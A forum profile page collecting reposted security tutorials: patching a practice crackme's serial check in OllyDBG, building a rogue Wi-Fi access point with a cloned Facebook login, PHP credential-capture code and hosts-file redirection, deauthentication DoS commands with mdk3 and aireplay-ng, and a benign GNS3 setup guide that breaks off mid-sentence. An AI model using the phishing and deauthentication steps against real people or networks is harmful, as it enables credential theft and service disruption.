Wubi
Active Members-
Posts
893 -
Joined
-
Last visited
-
Days Won
17
Everything posted by Wubi
-
Introduction What is a « ReverseMe »? Disassembling or debugging commercial programs is usually prohibited by international laws. When practicing reversing and when we need to study a kind of software protection, reverse engineers usually make some stand alone applications which implement only the protection, in other words it simulates the behavior of a software protection, nothing more nothing less! A “ReverseMe” as its name says, is a little piece of code compiled to produce one or more protections, and the whole is designed to be “reversed”, which means designed to be a target for practicing reverse code engineering and studying software protections without any risk regarding laws and intellectual properties. Tools needed Practicing reverse engineering includes mastering lot of tools, but mainly we are talking about tools like debuggers, dissemblers and hex editors. In this article we will use only one tool, a famous and widely used analyzer / dissembler / debugger which is OllyDBG. OllyDBG (or OllyDebugger) is free Microsoft Windows based 32 bits analyzing debugger used when we are in need of tracing registers, monitoring procedures and APIs calls or searching hard coded strings without having the source code of the target program which makes it one of the cracker’s most preferred tools. Links to download tools used in this article are in the bottom. Overview Our “ReverseMe.exe” was made to simulate a software that asks for a username and a serial key that is generated according to the username given. We will see how it tests if we filled in a correct serial number, how to force it into accepting an incorrect one, how it tests the correct and incorrect one, and how to use reverse engineering to make our ReverseMe calculate and show us the correct serial number corresponding to the user name entered. Let’s reverse it The first thing a cracker does when it comes time to “crack” software is look if his target is packed or encrypted or protected against disassembling or debugging. There are several tools that help in finding out executable file signatures of compilers, file encryptors or packers, like PEiD that says that our ReverseMe is not encrypted nor packed and was coded using MASM32 / TASM32. We can go ahead and start analyzing our target. First of all is running our target; as you can see, a simple one window program that prompts us to input a “Name” and a “Serial”, I filled the name with “Soufiane Tahiri” and typed a random sequence of numbers “1298762573? then I pressed “Check” button. Of course I have no chance of filling a correct serial without knowing it and its normal that I got this message: “Wrong Serial !” Figure 1. Typing a name and a random serial number. Technically, our ReverseMe may have a lot of ways to GET what we typed, to analyze it and to prompt us a message box, and this has always something to do with Windows APIs (said Win32 APIs and stands for Application Programming Interfaces), at this point we can think about looking for APIs that prompt a message box or APIs used to get text filled into text or input boxes. Usually when a program is brought to prompt a message box like the one we got with this ReverseMe, it makes a call to the MessageBox API which is a function belonging to the Microsoft Windows library user32.dll. Notes about MessageBox API: The MessageBox function creates, displays, and makes a message box work! MessageBox contains a main message (in this case “Wrong Serial !”) and a title (in this case “Error”), in addition to any combination of predefined icons and buttons (for instance the “OK” button that we have). A MessageBox function is structured this way: int MessageBox( HWND hWnd, LPCTSTR lpText,LPCTSTR lpCaption, UINT uType ); hWnd = Handle to the parent window. lpText = The main text of the message box. lpCaption= Title of the message box. uType = Determines the style of the message box. The MessageBox function has two versions depending on string arguments that it takes, either narrow (ANSI) or wide (Unicode), and that is the reason why we can find MessageBoxW that provides 2 bytes character Unicode formatting and MessageBoxA which gives 1 byte character ANSI formatting. Using OllyDBG we will set a breakpoint on every call to the API function MessageBoxA, so after disassembling our target we have two different ways to set breakpoints on API calls, the simplest one is by opening the command line using Alt+F1 and typing “BPX MessageBoxA” then “Enter”. Please note that the name of every WIN32 API is case sensitive. Figure 2. Setting Breakpoints to all MessageBoxA win32 API calls. To be sure that we correctly set breakpoint(s) we can use Alt+B to see a breakpoints list. Our ReverseMe makes two calls of the MessageBoxA API, first at address 00404411 and second at 00404427: Intermodular calls, item 28 Address=00404411 Disassembly=CALL <JMP.&USER32.MessageBoxA> Destination=USER32.MessageBoxA Intermodular calls, item 29 Address=00404427 Disassembly=CALL <JMP.&USER32.MessageBoxA> Destination=USER32.MessageBoxA After following the first address by simply double-clicking on its line we can clearly see that the fist call is used when the user fills an invalid serial number, and the second when he gives the correct one: 00404402 |. 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL 00404404 |. 68 BE604000 PUSH ReverseM.004060BE ; |Title = “Error” 00404409 |. 68 AF604000 PUSH ReverseM.004060AF ; |Text = “[COLOR=black][B]Wrong Serial ![/B][/COLOR]“ 0040440E |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hOwner [COLOR=red][B]00404411[/B][/COLOR] |. E8 0A010000 CALL <JMP.&USER32.MessageBoxA> ; \MessageBoxA 00404416 |. EB 14 JMP SHORT ReverseM.0040442C 00404418 |> 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL 0040441A |. 68 A7604000 PUSH ReverseM.004060A7 ; |Title = “orial !” 0040441F |. 68 7C604000 PUSH ReverseM.0040607C ; |Text = “[COLOR=black][B]Good[COLOR=#00b050] [COLOR=black]Job, Serial found . Write a little tutorial ![/COLOR][/COLOR][/B]“[/COLOR] 00404424 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hOwner [COLOR=red][B]00404427[/B][/COLOR] |. E8 F4000000 CALL <JMP.&USER32.MessageBoxA> ; \MessageBoxA To be sure that we are not wrong, let’s keep these breakpoints set, and start the ReverseMe by pressing F9, filling in some random information, then pressing “Check”: Figure 3. Breakpoint set on the first Call triggered when pressing Check. As expected, OllyDBG stops at the first call of MessageBoxA (Address 00404411) by pressing F8 (which is step over, in other words let the debugger execute the current line and pass to the second without passing the subroutine line by line). The message box with “wrong serial” will be prompted, and the unconditional JUMP at the address 00404416 will go to the address 0040442C, avoiding it by this way and showing the message box saying, “Good job…” We are here in front of a very basic protection type; just before the address 00404402 (before the beginning of passing parameters to the first message box) we can see curious CALL, TEST and JNZ (You can find more information about this in my first article here InfoSec Institute Resources – How to Break Simple Software Protections): 004043F9 |. E8 AB000000 [B]CALL[/B] ReverseM.004044A9 004043FE |. 85C0 [B]TEST[/B] EAX,EAX 00404400 |. 75 16 [B]JNZ [/B]SHORT ReverseM.00404418 The conditional jump JNZ goes to the address 00404418 and this way it jumps the first MessageBoxA’s call so it avoids showing “Wrong Serial”. Interesting! Set a breakpoint on the CALL at address 004043F9 (by pressing F2) and re press “Check” on the ReverseMe window. OllyDBG breaks on the line 004043F9 |. E8 AB000000 CALL ReverseM.004044A9, step into it by pressing F7 and let’s see what is inside the routine: Figure 4. Serial verification routine. We can see a call to the WIN32 API GetWindowTextA at address 004044B6. Notes about GetWindowText API: This API is structured this way : int GetWindowText(hwnd, lpString, nMaxCount) hwnd = Identifies the window or control whose title or text will be copied. lpString = Points to the buffer that will receive the string to copy. nMaxCount = Specifies the maximum number of characters to be copied in the buffer. If the string is longer than the number of characters specified by the parameter nMaxCount, it will be automatically truncated. This function copies the text of the control identified by the hWnd parameter. Refer to Figure 4 and notice that the ReverseMe: Sets the nMaxCount parameter to 50 characters at 004044A9 /$ 6A 32 PUSH 32. Points to the buffer that will receive the serial number entered at 004044AB |. 68 6C634000 PUSH ReverseM.0040636C. Identifies the control it will copy text from at 004044B0 |. FF35 A4684000 PUSH DWORD PTR DS:[4068A4]. Forcing ReverseMe to accept all given serial numbers Our first task is only to force ReverseMe to tell us “Good Job”, regardless of the serial number we type; we will see later what the routine shown in Figure 3 does exactly. The Reverse Me expects two “ends” of the routine mentioned above, either EAX = 1 or EAX = 0, which depends on executing either 004044DF |. B8 01000000 MOV EAX,1 or 004044E6 |> 33C0 XOR EAX,EAX and this will -with absolutely no doubt – lead to show either “Wrong Serial” or “Good Job” (refer to figure 3). To know which value EAX must get to ensure that our target accepts every serial number typed, let’s put a breakpoint on the RET at address 004044E8, and resume execution of our stopped program by pressing F9 and keep on having an eye on EAX values (which is right now equal to 9, the length of the serial number I entered “123456789?). Figure 5. EAX = 0 and OllyDBG breaks on the RET. At this stage continuing debugging will be just a waste of time! Logically an incorrect given serial will lead to an EAX = 0. Let’s force EAX to get 1 at the beginning of the verification routine (Figure 5) and see what this will produce. Restart the ReverseMe loaded inside OllyDBG using CTRL+F2, and by going directly to the first instruction on the concerned routine, which is at address 004044A9 (Ctrl+G > 004044A9. Press “space” and start changing this: 004044A9 /$ 6A 32 PUSH 32 ; /Count = 32 (50.) 004044AB |. 68 6C634000 PUSH ReverseM.0040636C ; |Buffer = ReverseM.0040636C 004044B0 |. FF35 A4684000 PUSH DWORD PTR DS:[4068A4] ; |hWnd = NULL Into this, by simply typing [I]mov eax,1[/I] and [I]ret[/I] : 004044A9 B8 01000000 MOV EAX,1 004044AE C3 RETN 004044AF 90 NOP 004044B0 |. FF35 A4684000 PUSH DWORD PTR DS:[4068A4] ; |hWnd = NULL You can remove already set breakpoints by going to the window list of breakpoints (Alt+ and pressing “Del” on your keyboard. Now we have to test our changes, run the ReverseMe by pressing F9 and type on concerned fields whatever you like, then press “Check”. Figure 6. As you can see, our ReverseMe now accepts every combination of names / serials. But note that modifications made until now are just in memory; to make these changes physically, you can right click on the disassembly code > Copy to executable > All modifications, in the little window prompted, click “Copy All”, right click on the window shown, then select “Save File”. Figure below: Figure 7. Steps to save a modified copy of a file. Understanding the routine of verification and fishing a valid serial number Now we know that our serial number is checked somewhere in this routine: 004044A9 6A 32 PUSH 32 004044AB 68 6C634000 PUSH ReverseM.0040636C 004044B0 |. FF35 A4684000 PUSH DWORD PTR DS:[4068A4] ; |hWnd = NULL 004044B6 |. E8 4D000000 CALL <JMP.&USER32.GetWindowTextA> ; \GetWindowTextA 004044BB |. 0BC0 OR EAX,EAX 004044BD |. 74 29 JE SHORT ReverseM.004044E8 004044BF |. 33C9 XOR ECX,ECX 004044C1 |. 33D2 XOR EDX,EDX 004044C3 |. 33DB XOR EBX,EBX 004044C5 |. 33FF XOR EDI,EDI 004044C7 |> 8B91 6C634000 /MOV EDX,DWORD PTR DS:[ECX+40636C] 004044CD |. 8B99 6C674000 |MOV EBX,DWORD PTR DS:[ECX+40676C] 004044D3 |. 33D3 |XOR EDX,EBX 004044D5 |. 75 0F |JNZ SHORT ReverseM.004044E6 004044D7 |. 83C1 04 |ADD ECX,4 004044DA |. 47 |INC EDI 004044DB |. 3BF8 |CMP EDI,EAX 004044DD |.^7C E8 \JL SHORT ReverseM.004044C7 004044DF |. B8 01000000 MOV EAX,1 004044E4 |. EB 02 JMP SHORT ReverseM.004044E8 004044E6 |> 33C0 XOR EAX,EAX 004044E8 \> C3 RETN Once we’ve set a breakpoint at the address 004044A9, we can start a debugging session by pressing F9, (I typed in the fields Name and Serial respectively “Soufiane Tahiri” and “12344321?). After clicking on the button Check, OllyDB stops on the line with the breakpoint set at, at this point we will keep on analyzing what the ReverseMe does exactly by “Tracing or Stepping Over” each instruction, and notice that there is a kind of sub-routine inside our “main” routine: Figure 8. Serial number comparison sub-routine. Arriving at the line: 004044C7 |> 8B91 6C634000 /MOV EDX,DWORD PTR DS:[ECX+40636C] our ReverseMe puts the value of the address ECX+40636C INTO EDX. We can follow this value in dump to see its content: Figure 9. Following in dump address 40636C. (To follow it in dump, on OllyDBG “window stat” right click on DS:[0040636C]=34333231 > Follow address in Dump). We can clearly see the serial number we typed, so ReverseMe puts the address that contains the serial typed in EDX. The instruction that comes after is: 004044CD |. 8B99 6C674000 |MOV EBX,DWORD PTR DS:[ECX+40676C], by redoing the same thing we will see that ReverseMe puts the address that contains “some numbers” in ECX. Figure 10. This seems to be our valid serial number, but what make this probable are the upcoming two instructions: 004044D3 |. 33D3 |[B]XOR EDX,EBX [/B]004044D5 |. 75 0F |JNZ SHORT ReverseM.004044E6 We saw that ReverseMe puts any serial number typed in the register EDX and some numbers (which represent certainly the correct serial number) in the register ECX; after these operations comes a XOR between values of both registers. Notes about XOR XOR is a binary operation like all others and represents an exclusive OR between destination and source. XOR is used in cryptography as a type of additive cipher which works according to this principle: [TABLE=class: grid, width: 500] [TR] [TD]A[/TD] [TD]XOR[/TD] [TD]B[/TD] [/TR] [TR] [TD]0[/TD] [TD]0[/TD] [TD]0[/TD] [/TR] [TR] [TD]0[/TD] [TD]1[/TD] [TD]1[/TD] [/TR] [TR] [TD]1[/TD] [TD]0[/TD] [TD]1[/TD] [/TR] [TR] [TD]1[/TD] [TD]1[/TD] [TD]0[/TD] [/TR] [/TABLE] We have: 004044C7 |> 8B91 6C634000 /MOV [B]EDX[/B],DWORD PTR DS:[ECX+40636C] 004044CD |. 8B99 6C674000 |MOV [B]EBX[/B],DWORD PTR DS:[ECX+40676C] 004044D3 |. 33D3 |XOR [B]EDX[/B],[B]EBX [/B] With EDX=34333231 and EBX=39393834 in decimal which is equal to 110100001100110011001000110001 and 111001001110010011100000110100 in binary. 004044D3 |. 33D3|XOR EDX,EBX will do the exclusive OR and put the result into EDX, that means it will do : 110100001100110011001000110001 XOR 111001001110010011100000110100 which is equal to 1101000010100000101000000101 (and D0A0A05 in hexadecimal). Figure 11. Since we are “Xoring” two different values the result will always be different from zero and the conditional jump to come at the line 004044D5|. 75 0F|JNZ SHORT ReverseM.004044E6 will be taken and will go to 004044E6 |> 33C0 XOR EAX,EAX for resetting the value of EAX to zero (XOR same values) This routine continues: 004044D7 |. 83C1 04|ADD ECX,4 : Adds 4 to the value of ECX. 004044DA |. 47|INC EDI : Increments by 1 the value of EDI. 004044DB |. 3BF8|CMP EDI,EAX : Compares if values of EAX and EDI are identical by making a logical subtraction. 004044DD |.^7C E8 \JL SHORT ReverseM.004044C7 : Jumps to 4044C7 if the value of EDI stills less than the EAX’s one. After trying the serial number fished (refer to Figure 10), we can see that it really works: Figure 12. Making a serial number self-generator This step is considered very classical when it comes to practicing reverse code engineering and may be useless but still is funny! Instead of showing us “Wrong Serial” we will change some bytes to let ReverseME show us the correct serial number. Now we know two important things, the first one is that ReverseMe stocks the correct serial number at the address 40676C (refer to Figure 10) and loads the text “Wrong Serial !” from the address 4060AF as seen here: Figure 13. Note about the instruction PUSH As its name indicates, this instruction is used to place a 16 or 32 bits value at the top of the stack. Example: Push AX Push BX Push 1000 First AX is pushed onto the stack, then BX, but it is 1000 which will come out first. We will change the address pushed at the line: 00404409 |. 68 AF604000 PUSH ReverseM.004060AF ; |Text = “Wrong Serial !” by the address that contains the correct serial number: By changing this PUSH ReverseM.004060AF into this PUSH ReverseM.0040676C Figure 13. Address push changed The same way we saved first changes (refer to Figure 6) I saved these changes and as expected here is the result: Figure 14. ReverseMe serial self-generator Hope you learned something new from this article! Tools download links: OllyDBG: Download PEiD: Download PEiD 0.95 Free - Detects packers, cryptors and compilers - Softpedia Target: ReverseMe.exe References: http://msdn.microsoft.com/en-us/library/windows/desktop/ms645505(v=vs.85).aspx Specifying a Character Set Exclusive or - Wikipedia, the free encyclopedia Sursa InfoSec Institute Resources
-
Introduction Before beginning this article I want to clear up some stuff about awareness. Everything that is going to be described in this article must be used only for educational purposes. A tool could be used not only for good purposes, but also for doing a bad thing to users, like stealing their credentials, which by law is a crime and must be punished. So I will describe how you can make an access point and see the possibilities that might happen in real life, so in other words this is a real life scenario; thus we must prevent it. A rogue access point is a spot to where you can connect your machine, where the data that is transmitted through is recorded (sniffed) or redirected to fake web pages. Stealing data with fake web pages is called a phishing attack. So enjoy this article and this journey and see how attackers want to play with people’s ignorance, and how they can trick you to fall in their trap. Recommended Reading and Tools Rogue access point - Wikipedia, the free encyclopedia The Rouge Wireless Device Problem - Webopedia.com How To Secure Your Wireless Network: Identifying Rouge Wireless Devices | Joey Muniz - The Security Blogger Social Engineering Videos and Tutorials https://www.trustedsec.com/downloads/social-engineer-toolkit/ Recommended tools: Back Track 5 r3 dhcpd3-server Apache web server MySQL SET – Social-Engineering toolkit Wi-Fi – USB or laptop doesn’t matter as long as it is supported by the applications of Back Track. Raising a Rogue Access Point Making a rogue Access Point is not a hard task, especially when you have tools that are meant to do that. This is dangerous if you use it in public places like shopping malls or some conferences where the Internet connection is important for people addicted to Facebook, Twitter or Google products (there are a lot of them). Imagine that you bring down an existing Access Point, and trick everyone to connect to your rogue Access Point, that way you will get a lot of private data. We will start our scenario first with using SET – Social-Engineering Toolkit. Figure 1. Starting SET When you open it, you will see a lot of options, a myriad of them. When starting your first time with SET, you will see that you have to agree to use the tool for educational and legal purposes only. This is a great tool for penetration testing in a company, to see if the employees are vulnerable to social engineering attacks. Figure 2. SET interface For our scenario we will use the first option, Social-Engineering Attack, where you are offered again with many options. In this section we have a lot of interesting options that can be used for penetration testing like: browser exploitation, execution of evil code on client side, spoofing of SMS by sending a message, QRCode exploiting… and most important for our scenario, Wireless Access Point Attack Vector (its number is 8). Figure 3. SET attack vectors After using the Wireless Access Point Attack Vector, now we can START or STOP our Access Point, but before starting it, we must configure some applications. For using this attack vector, as you can see from the description: “This attack vector requires AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3?. With the default installation of Back Track 5, most of them are properly configured, except for dhcpd3. Figure 4. SET attack vectors Figure 5. Installing dhcp3-server So we need to install “dhcp3-server”. To install it, just type “sudo apt-get install dhcp3-server”. As you can see you will get an error that is not allowing the service to start. To fix that error we need to open with “vi” editor the configuration file “dhcp3-server” in directory “/etc/default/”. Add “at0?, and that will allow us to use a range of IP addresses. Figure 6. Editing the configuration file GOOD! Now we are going back to the terminal when we can START or STOP the Wireless Access Point Attack Vector as displayed in figure 4. When you click “START the Wireless Access Point Attack Vector”, it will open the same file with nano editor that was previously edited when we added the name of the interface (at0), but do not make any changes, just close it with CTR-X. Also choose the range of IP addresses you will be using for your Access Point. In this article I have chosen the second option (range 192.168.10.100-254). Figure 7. Picking the address range With this step we will make every user that will connect to our Access Point to have an IP address. If the activation is successful you will get the following message displayed in figure 8. Figure 8. SET rogue Access Point activated If the Access Point is up, you will get the following results displayed in figure 9, 10 and 11. As displayed in figure 11, I raised an Apache server, just to see and be sure that my Access Point is working properly. Figure 9. Results of raising an Access Point Figure 10. Successful usage of dhcp3-server Figure 11. Testing the Access Point If you succeed to raise an Access Point, the name of it will not be “evil”, but “linksys”. You can change the name of it in the following files: “/pentest/exploits/set/config/set_config” and “/pentest/exploits/set/config/set_config.py”. It is under the “ACCESS_POINT_SSID=linksys” parameter in both files. Just to know, SSID (Service Set Identifier) is a 32-character key (name) used to identify Wi-Fi (Access Points). Making a Phishing Scenario The next step is to use the current Access Point and make a phishing scenario. In order to make such a scenario i prefer doing the stuff manually, because it is better to know how really things work. For this article I cloned the front page of www.facebook.com, and changed a bit. I have also made a database table in MySQL for this phishing scenario. You can create a MySQL database in Back Track using these commands: mysql –h localhost –u root –p Enter password: toor CREATE DATABASE hax0r; USE hax0r; CREATE TABLE hacked ( id INT, username VARCHAR(100), password VARCHAR(100) ); Figure 12. Making a database and table for the phishing scenario The creation of the database is also shown in figure 12. The next step is to insert a record in our database and see if it is working correctly. We have the following PHP code: $con = mysql_connect(“localhost”,”root”,”toor”); if (!$con) { die(‘Could not connect: ‘ . mysql_error()); } mysql_select_db(“hax0r”, $con); mysql_query(“INSERT INTO hacked (username, password) VALUES(‘eat@me.com’, ‘lool’)”); mysql_close($con); ?><?php If the execution of this PHP code is successful, it will result in inserting a new record in the table. Figure 13. Testing the phishing web site As I said previously, I have made a modified www.facebook.com, and also combined the PHP code with it. The main idea here is to take the values that are inserted in “Email or Phone” and “Password”, and insert them in database. Figure 14. Facebook clone To make the site appear when users enter www.facebook.com in their browser, I added the following links in “/etc/hosts”. 127.0.0.1 [URL="http://www.facebook.com"]Willkommen bei Facebook - anmelden, registrieren oder mehr erfahren[/URL] 127.0.0.1 facebook.com 127.0.0.1 static.ak.fbcdn.net 127.0.0.1 [URL="http://www.static.ak.fbcdn.net"]www.static.ak.fbcdn.net[/URL] 127.0.0.1 login.facebook.com 127.0.0.1 [URL="http://www.login.facebook.com"]www.login.facebook.com[/URL] 127.0.0.1 fbcdn.net 127.0.0.1 [URL="http://www.fbcdn.net"]Willkommen bei Facebook - anmelden, registrieren oder mehr erfahren[/URL] 127.0.0.1 fbcdn.com 127.0.0.1 [URL="http://www.fbcdn.com"]Willkommen bei Facebook - anmelden, registrieren oder mehr erfahren[/URL] 127.0.0.1 static.ak.connect.facebook.com 127.0.0.1 [URL="http://www.static.ak.connect.facebook.com"]www.static.ak.connect.facebook.com[/URL]# Redirect to Achebook.com Now I have modified the PHP script again so that everything that is submitted in the login screen will be inserted in the database. $con = mysql_connect(“localhost”,”root”,”toor”); if (!$con) { die(‘Could not connect: ‘ . mysql_error()); } mysql_select_db(“hax0r”, $con); if(isset($_POST["email"])){echo “email:”.$_POST["email"].”<br/>”; $email = $_POST["email"];} if(isset($_POST["pass"])){echo “pass:”.$_POST["pass"]; $pass = $_POST["pass"];} if (isset($_POST["email"]) &&isset($_POST["pass"])){ $query = “INSERT INTO hacked (username, password) VALUES(‘$email’, ‘$pass’)”; mysql_query($query); mysql_close($con); } ?> I added the two lines to see if the characters I am entering are really inserted. if(isset($_POST["email"])){echo “email:”.$_POST["email"].”<br/>”; $email = $_POST["email"];} if(isset($_POST["pass"])){echo “pass:”.$_POST["pass"]; $pass = $_POST["pass"];}<?php To test our scenario, we will type in our browser www.facebook.com and see if it is working. Figure 14. The site is working…YUPPIIIII. Wi-Fi Denial Of Service If we want our Access Point to be more exposed to a bigger mass of users, we will make a DoS – Denial of Service attack on an existing Access Point. Making a clone of an existing Access Point and raising another one with the same name, but with malicious intentions, is called Evil Twin. The first thing we need to do, is to perform scanning and search for existing Access Points. In Back Track 5 r3, we can do that with “iwlist wlan0 scan”, and the results you’ll get will be like in figure 15. Figure 15. Scanning for Access Points The first “Cell 01? is my home Wi-Fi router, and I will use it to perform a DoS attack. From the result of scanning we can extract the following information: Address, Channel and ESSID. So I have C0:3F:0E:5E:26:6C, the channel is 6, and ESSID is “Doma”. The next step is to use airmon-ng and set our Wi-Fi interface to monitor mode. To start monitor mode type “airmon-ng start wlan06?. Figure 16. Starting monitor mode After starting monitor mode we will use “mdk3? for making Denial Of Service. The interface of the application is displayed in figure 17, where you can see that there are a lot of options. If the options are combined it might become pretty dangerous and could bring the whole Wi-FI or WLAN network down. Figure 17.mdk3 options For attacking our target we need its Address and ESSID, we can use that information from figure 15. We will utilize these pieces of information for activating “Deauthentication / Disassociation Amok Mode” which have the following description “Kicks everybody found from AP”. We can launch that attack by typing the following command “mdk3 mon0 d –b list –c 6?. “mon0? is the interface for monitoring that previously we created, “d” is the mode for “disassociation amok”, and the option “-b” is a simple text file containing the address of our target, and “-c”holds value 6, which is the channel of the Wi-Fi. Figure 18. Deauthentication / Disassociation Amok Mode Open a new terminal tab and start mdk3 with option “a” for “Authentication DoS”, and option “-m” for canceling all the authentication traffic, and fill the option “-i” with the physical address of your Wi-Fi card. Figure 19. Authentication DoS Figure 20. Aireplay-ng options menu Figure 21. Aireplay-ng in action On the official aircrack-ng page you will see that aircrack-ng could be employed for different scenarios, and that there are a lot of options for using and combining different types of attacks. All of them are pretty simple to use, but the effects are devastating to the network that is attacked. With “aircrack-ng” and with the option “-0? we can send deauthentication packets to the clients that are connected or want to connect on a particular Access Point. “1000? is a defined number of packets that will be sent. Now after some time let’s see what has happened. Open the Network Manager and see the results. Now I am pretty in a bad situation, because my router started to freak out and doesn’t allow me to login to it, which is bad. This is a perfect opportunity to raise a fake Access Point, but as I have mentioned before this is only for penetration testing and any misuse of it must be punished by law. Figure 21. No more networks Figure 21. No more logins for you mister!!! Conclusion When I hear the words, “My network is safe and it doesn’t need additional protection”, I start to laugh so much, sometimes I think I’ll get a heart attack. There is no 100% bullet proof security, especially in a time when technology advances fast. Remember this: “Everything is buggy”, and that is because we are humans and we make mistakes, sometime very stupid mistakes, because of lack of knowledge and we think that we are doing things the right way. But what is the right way, what is the wrong way of doing things? That is a tricky question, today there is a lot of information and the abstraction and complexity of things makes it even harder for us to understand what is truly right and wrong. References and Useful Links Sursa InfoSec Institute Resourceshttp://kb.netgear.com/app/answers/detail/a_id/1142/~/what-is-a-wireless-network’s-ssid%3F How To Block Facebook Using Hosts File | Cariblogger.com airmon-ng [Aircrack-ng] A day with Tape: MDK3 - network traffic disruption No Useful Articles Here....: [Tutorial] Wireless Havoc With MDK3!! (IV) Enc0de's blog: ((W)) Interface's of mass D357RUC7I0N. aireplay-ng [Aircrack-ng] deauthentication [Aircrack-ng]
-
What is GNS3? GNS3 is abbreviation for Graphical Network Simulator that allows IT students to simulate complex networks that will help them to prepare seriously for CISCO certificates (CCNA, CCNP, CCIE, etc.), Juniper certificates (JNCIA , JNCIS, JNVCIE), Microsoft certificates (MCSA, MCSE, MCITP) and Red Hat certificates (RHCE, RHCT), and it will help IT administrators to implement any technology and test it before purchasing this technology. Graphical Network Simulator (GNS3) is an open source project that allows you to download the source code and read it for any kind of educational purposes and / or contribution purposes. It works for multiple operating systems (Windows, Linux, Mac OS X), and the most beautiful thing is that GNS3 now is integrated to both VMware and Virtualbox. All versions before 0.8 don’t support Virtualbox, so take care about which version you will use if you deal with Virtualbox. Download and Installion To download GNS3, you have to download it from the official page here. As mentioned earlier,GNS3 supports three different operating systems (Windows, Linux, and Mac OS X) . Windows Installation The first step in the installation process is to download the all-in-one version from SourceForge here. After downloading, go to the folder that holds the GNS3 executable and double click on it. The wizard will begin directly and it is easy to configure. As we can see, GNS3 needs to install some components like WinPCAP (used for sniffing packets), Dynamips (Cisco IOS emulator), and Qemu (a generic and open source machine emulator and virtualizer). The last step in configuring GNS3 in Windows operating systems is to define your own CISCO IOS files. You have to buy the CISCO IOS file for your desired platform and use it in the lab enviroment for educational purposes. You can download it from the Internet for free from torrent sites but of course it breaks CISCO policies and it’s illegal. The supported platforms are CISCO 7200, 3600 series (3620, 3640 and 3660), 3700 series (3725, 3745) and 2600 series (2610 to 2650XM, 2691). To add your CISCO IOS image to the GNS3, go to edit, then IOS images and hypervisor, then add your own IOS , then determine your platform and your model, and finally add your IDLE PC value, which is eight hex values (reduces the processor usage). After configuring your router or switch, let the device determine its best value for the IDLE PC, as you can see from the following image. Then click the save button and then the close button. Linux Installation For installing GNS3 in the Linux operating system, there are two ways: 1- Install GNS3 using Ubuntu Software Center 2- Install GNS3 from the source code The first way is the easiest way for configuring GNS3 in the Linux operating system.We can do it by command line or from Ubuntu Software Center. So by command line, type in the following command in the terminal: sudo apt-get install gns3 It will ask you to download their dependencies software, the software that we have mentioned in the Windows installation. Or download it from Synaptic Package Manager. To find it, go to the system menu, then choose Ubuntu Software Center, then search for GNS3 and then click the install button, as you can see from the following image. Put in your mind that when downloading GNS3 from command line or Ubuntu Software Center, it will not install the latest version of it, so you have to download it from the source code, and that is what we will talk about now. The second way is install GNS3 from the source code. To install it, we must download the source code file from the download page on SourceForge here. Then we have to extract the zipped file by right clicking on it, then choose extract. Then you need to download the latest version of the Dynamips binary for Linux here.These are the latest versions of Dynamips: Download Dynamips Dynamips 0.2.8-RC3-community binaries for Windows Dynamips 0.2.8-RC3-community binary for Mac OS X (Intel 64-bit) Dynamips 0.2.8-RC3-community binary for Mac OS X (Intel 32-bit) Dynamips 0.2.8-RC3-community binary for Linux (32-bit) Dynamips 0.2.8-RC3-community binary for Linux (64-bit) Dynamips 0.2.8-RC3-community sources Dynamips 0.2.8-RC2 binaries for Windows Dynamips 0.2.8-RC2 binary for Mac OS X Dynamips 0.2.8-RC2 binary for Linux (32-bit) Dynamips 0.2.8-RC2 binary for Linux (64-bit) Dynamips 0.2.8-RC2 sources So we will download Dynamips 0.2.8-RC3-community binary for Linux (32-bit) and we have to make it executable by allowing the execution bit. Then run GNS3 script and the other steps will be the same as the Windows installation. Sometimes you will get the following error while connecting between devices: “206 unable to create generic ethernet nio”. It may occur because of permission issues. For further details about that error, please visit the GNS3 forum here. You may also find the error “baseconfig.txt no such file or directory”. To solve it, just remove baseconfig.txt information while you define your CISCO IOS image. For further details, please visit the GNS3 forum here. Now it’s time to demonstrate how to use GNS3 in a simple topology. I draw my topology in a program called DIA. As you can see from the following picture, the topology is so simple. Our lab requirements are : 1- vmware workstation 2- two virtual box (XP1 , XP2) 3- GNS3 4- DIA Configuring the Virtual Network First of all, we have to configure the VMware workstation nework, so go to Edit -> Virtual network editor. There are 10 different Virtual Network Interfaces (VMnet0 to VMnet9). VMnet 0 is configured for bridging and VMnet8 is configured for NAT, and both of them shouldn’t be modified. Other VMnets we can modify for any values we need to. So in this demo we will create two networks, VMnet 2 and VMnet 3. Also we will configure the DHCP service to work with this network. We will configure VMnet2 as a host only by choosing the hostonly option. The VMnet2 IP address will be 192.168.2.1 and DHCP service IP ranges start from 192.168.2.1 til 192.168.2.254. The same thing for VMnet3;, IP address will be 192.168.3.1 and DHCP service IP ranges start from 192.168.3.1 till 192.168.3.254. We are using DHCP service for distributing IP addresses to Vms that are connected to this network interface. Installing and Configuring Virtual machines We will install Windows XP Service Pack 3 in VMware and called it XP1 so go to File -> News -> Virtual machine, then keep the default option on VMware hardware capability and click Next. Tthen choose Custom (Advanced) and click next, then choose the installer disk image file, then choose Windows XP Service pack 1disk image (.ISO) and click Next. It’s time to choose the name of the machine. Here I’ve choosen XP1. Then specify the path where you want to keep VMware files and click Next. Chose the proper processor info. If it’s a processor with 2 cores then select No. of Processors: 1 and No. of cores per Processor: 2 and click Next. It’s time to allocate memory RAM, so for Windows XP SP3 we will allocate 512 MB of RAM, then click Next. In the network type, choose anything because we will configure it later, but you can choose ’Use Bridge Networking’ to enable an Internet connection to your guest machine in VMware, and click Next. Then we will choose the recommended I/O adapter and click Next. Then we will select ”Create a New Virtual Disk” to create a new virtual hard disk, then click Next. Then use the recommended disk type and click Next, now it’s time to specify 20 GB of disk space and make sure that “Store virtual disk as a single file” is checked and click Next. Finally specify the disk file name and the location where it will be stored, then click Next. It’stime to customize the Hardware to install additional VMnets that we had created. Because we should assign each guest machine to a different network, we will assign XP1 with Vmnet2, which has the network port 192.168.2.0, and assign XP2 with Vmnet3, which has the network port 192.168.3.0. So we will follow these instructions: 1- Click on ‘Customize Hardware’ and click on Add. 2- Select Network Adapter and click Next. 3- Chose Custom and select VMnet2. 4- Check ‘Connect on Power on’ Here are some notes: 1- The previous instruction for adding a network adapter in XP1 has us select VMnet2, so when adding a network adapter in XP2, we have to select VMnet 3. 2- To work with the host machine use ctrl+alt. 3- To work with the guest machine use ctrl+g. So after installation, if we configured the network adapter right, we should see that the guest machine took its IP address from the DHCP service and connected with VMnet2 and VMnet3, so XP1 IP address should be 